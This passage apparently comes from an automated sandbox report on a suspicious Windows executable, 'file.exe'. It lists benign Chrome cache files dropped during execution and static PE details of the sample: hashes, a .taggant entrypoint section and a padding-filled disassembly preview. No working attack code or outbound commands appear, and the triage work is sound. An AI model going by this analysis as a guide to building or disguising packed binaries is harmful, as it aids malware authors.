31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 169

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13842
Entropy (8bit):	7.802399161550213
Encrypted:	false
SSDEEP:	192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
MD5:	F6EC97C43480D41695065AD55A97B382
SHA1:	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
SHA-256:	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
SHA-512:	22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo\|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo\|.Mh.km..A.k..k....n.C`\|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

Chrome Cache Entry: 170

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	5644
Entropy (8bit):	4.785769732002188
Encrypted:	false
SSDEEP:	96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
MD5:	B5885C991E30238110973653F2408300
SHA1:	39B0A79D951F8254E21821134E047C76F57AD2A8
SHA-256:	085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
SHA-512:	6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
Malicious:	false
Reputation:	unknown
Preview:	{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

Chrome Cache Entry: 171

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	35005
Entropy (8bit):	7.980061050467981
Encrypted:	false
SSDEEP:	768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
MD5:	522037F008E03C9448AE0AAAF09E93CB
SHA1:	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
SHA-256:	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
SHA-512:	643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.\|.n..]..m..`W..W.H.~..\|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y\|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il\|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......\|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

Chrome Cache Entry: 172

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	4897
Entropy (8bit):	4.794639101874543
Encrypted:	false
SSDEEP:	96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzVqrpCvJ4QG63JjJ+do88HxbqP:dgQ+KfZcbhaWjp45qtAdflfDOFnNgBy4
MD5:	84E6C95F0E5378BDA94FA965C4692FAF
SHA1:	7C1D6572906509B08F8CD7B7A33EB9F9697EE6D1
SHA-256:	88A4A7B4F1160F8CAD3EB835116C29AC39659D586D4DADC54D9E40AC7E1BC610
SHA-512:	D34BFF37F8402B4A1FEE3C26F247A86D72666647A10E83D711A1BED1D24C6FC13674D65DCC037C22811B227FEC34B5DE20442191A42F9D78FC79D55FD5792761
Malicious:	false
Reputation:	unknown
Preview:	{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

Chrome Cache Entry: 173

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
Category:	dropped
Size (bytes):	33370
Entropy (8bit):	7.973675198531228
Encrypted:	false
SSDEEP:	768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
MD5:	6E78EE324E008296108BFCDECD77E318
SHA1:	F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
SHA-256:	EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
SHA-512:	BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
Malicious:	false
Reputation:	unknown
Preview:	......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A.$"3!h.~`>.....d+.,.a).Rb.I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.\|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..\|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..

Chrome Cache Entry: 174

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
Reputation:	unknown
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Chrome Cache Entry: 175

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1432
Entropy (8bit):	4.986131881931089
Encrypted:	false
SSDEEP:	24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
MD5:	6B8763B76F400DC480450FD69072F215
SHA1:	6932907906AFCF8EAFA22154D8478106521BC9EE
SHA-256:	3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
SHA-512:	8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
Malicious:	false
Reputation:	unknown
Preview:	// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &

Chrome Cache Entry: 176

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
Category:	dropped
Size (bytes):	19696
Entropy (8bit):	7.9898910353479335
Encrypted:	false
SSDEEP:	384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
MD5:	4D0BFEA9EBDA0657CEE433600ED087B6
SHA1:	F13C690B170D5BA6BE45DEDC576776CA79718D98
SHA-256:	67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
SHA-512:	9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
Malicious:	false
Reputation:	unknown
Preview:	wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t..........3..C..?u....E.S$.:.....mfZ......... .Q...].y..@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V...=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.\|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......\|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.\|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.\|49.......]

Chrome Cache Entry: 177

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (33148), with no line terminators
Category:	dropped
Size (bytes):	33148
Entropy (8bit):	4.917595394577667
Encrypted:	false
SSDEEP:	384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
MD5:	C4DE3932AA578FA03847604F09660315
SHA1:	5EFBA9D7F437AF4786560559FBF162C4475AAD4F
SHA-256:	7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
SHA-512:	3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
Malicious:	false
Reputation:	unknown
Preview:	{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

Chrome Cache Entry: 178

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	47062
Entropy (8bit):	5.016115705165622
Encrypted:	false
SSDEEP:	768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
MD5:	B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
SHA1:	A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
SHA-256:	411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
SHA-512:	59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st

Chrome Cache Entry: 179

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	dropped
Size (bytes):	157041
Entropy (8bit):	6.023126891991522
Encrypted:	false
SSDEEP:	3072:vyR2ItCIUQ+VyehtzdC541zeyrfg9xHaCc4lqnS9nPPKExcwKSpm2vzcXGysc4Y:6ntJQtzdCcayjg3H5snS9n3nxThBzsGq
MD5:	E369EEBBA9FF333B20FE1615517B9DDE
SHA1:	25DEF80491F3586C560943D5F7E3EE6E89B7A13F
SHA-256:	BBD9F97DBEAF5BBC4DAFB532A23CF204E17D8EA860378E863267ED1CD836F958
SHA-512:	DFB1B35BCD99D645596CEF1C88D6FDB16D1E932A50E59BB5822CD551D9A0D6FF0E678C654B69877E21B7833ECA2F8D9DAB1F44D6EEF3AF1EC95C128B9BA73041
Malicious:	false
Reputation:	unknown
Preview:	)]}'.{"ddljson":{"accessibility_description":"","alt_text":"Celebrating the Kayak","dark_data_uri":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAfQAAADICAMAAAApx+PaAAAAAXNSR0IArs4c6QAAAwBQTFRFR3BM/////39/wqybwq2dxq6cx6ycxq2cxq2cxq2cxq2cxq2cxq2cxqycxqycxq2cxq2cxqycxq2cxqycxq2cxq2cxqycxq6cxq2cxq6dxqqbxq6dxa6dxqqbxq+dxqubxq6c/+zW/+LN/NrG9NXA7tG88M686s657Mu56My35sq26Me25Mm04cez5cSzzc6638Sx1ce24cGw3cKvzci13r6u2cCs2b2rzMKw1byp2Lqq0rqn1benz7el0rSkzbWjz7Kiy7OhybKezLCgyLGfyLGeyLGdx7Gdx7Cex7Cdyq6eyK+dxrCdy62eya6dxa+ixq+dya2dx66dxa+dyK2byaydx62dxa6dxa6cx62bxa2gyKydxq2dxK6dyKycxq2cxK6cyaudx6ydxa2dxqydxK2dx6yaxqycxK2cxK2bxaydxqyax6ucxaybxqucxKybxaudx6qcxauaxqqcxqqbx6mbxaqbxqmbxKqax6ibxamawauaxqiax6eaw6eYyaSXvqeWvqOVuqSUuaGStp+PtZuOsJuLspeKrJeIrJSHwYh9p5OEqJCEo5CBpY6BoY6Ao4yAoIx+oIl9nop9uH50nIh7mYZ5mYN4loN2lIF1kn9zj31xj3twsmtijHpui3htiHdriHRqhXRpg3Jnhm9mgXBlgG1kfW5jfGtirVVOempgeGhedmZcc2RbcWJZb2FYbl9WbV5Val1UaVpSZ1tRpz46ZlhQZFdOYlVNYFNLXlJKXVBJW09HWU1GV0tEpigmVUpDVElCUkdAUEU/TkQ9yw4ETEI8SkA6vQ4GRz

Chrome Cache Entry: 180

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3130
Entropy (8bit):	4.790069981348324
Encrypted:	false
SSDEEP:	48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
MD5:	EBA6E81304F2F555E1D2EA3126A18A41
SHA1:	61429C3FE837FD4DD68E7B26678F131F2E00070D
SHA-256:	F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
SHA-512:	3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
Malicious:	false
Reputation:	unknown
Preview:	{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.946782640864916
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'812'480 bytes
MD5:	a8916b1db51981824cf0545df6864fb9
SHA1:	1faea8faf266fd74109256096cc1dce4acb9298b
SHA256:	bc6ce7042e0b92a139c10c803493adc1c87bddb4fe2f9f44a9f2a052833960e8
SHA512:	df9ba0e339eb25f2cffe7bd17d9b50a6407f89f8580c5e1f5f5696308780ee22cbd8c3d7d4a060a4fab9036b4964ba66b2c5e9ff02e93b2dd870cf6f7b4bf5ed
SSDEEP:	24576:iyO0WNSipzzzKsELqntGnCp3o4J1LqwbbVtFMDjJnucPk5XJt6mtJC:i0e746tyoEwOucPk5XJ8
TLSH:	9C8533B6BD6F639EC034537CDDFDA766F62F2900149E320AF6488E10852562A63D21FD
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xa98000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F702D31F26Ah
jbe 00007F702D31F281h
add byte ptr [eax], al
jmp 00007F702D321265h
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24b04d	0x61	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24b1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
